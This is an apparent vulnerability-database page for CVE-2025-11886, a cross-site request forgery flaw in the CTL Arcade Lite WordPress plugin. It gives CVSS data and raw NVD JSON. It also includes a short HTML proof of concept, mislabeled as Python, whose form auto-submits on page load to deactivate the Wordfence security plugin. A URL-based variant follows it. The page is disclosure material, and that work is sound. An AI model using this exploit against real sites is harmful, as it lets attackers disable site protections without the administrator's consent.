Security Vulnerability Report
中文
CVE-2025-11886 CVSS 4.3 MEDIUM

CVE-2025-11886

Published: 2025-11-11 04:15:44
Last Modified: 2026-04-15 00:35:42

Description

The CTL Arcade Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'ctl_arcade_lite_page_manage_games' page. This makes it possible for unauthenticated attackers to deactivate and activate arbitrary plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CTL Arcade Lite <= 1.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11886 PoC: CSRF to Deactivate Wordfence Plugin --> <html> <body> <h1>CVE-2025-11886 CSRF PoC</h1> <p>Click the button below to deactivate wordfence plugin</p> <form action="http://target-site.com/wp-admin/admin.php?page=ctl_arcade_lite_page_manage_games" method="POST" id="csrfForm"> <input type="hidden" name="action" value="deactivate" /> <input type="hidden" name="plugin" value="wordfence/wordfence.php" /> <input type="hidden" name="_wpnonce" value="" /> <input type="submit" value="Deactivate Plugin" /> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- Alternative: URL-based PoC --> <!-- http://target-site.com/wp-admin/admin.php?page=ctl_arcade_lite_page_manage_games&action=deactivate&plugin=wordfence/wordfence.php -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11886", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:44.277", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CTL Arcade Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'ctl_arcade_lite_page_manage_games' page. This makes it possible for unauthenticated attackers to deactivate and activate arbitrary plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://wordpress.org/plugins/ctl-arcade-lite/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/44bca8c2-1591-484c-ac40-8c968d5d1cad?source=cve", "source": "[email protected]"}]}}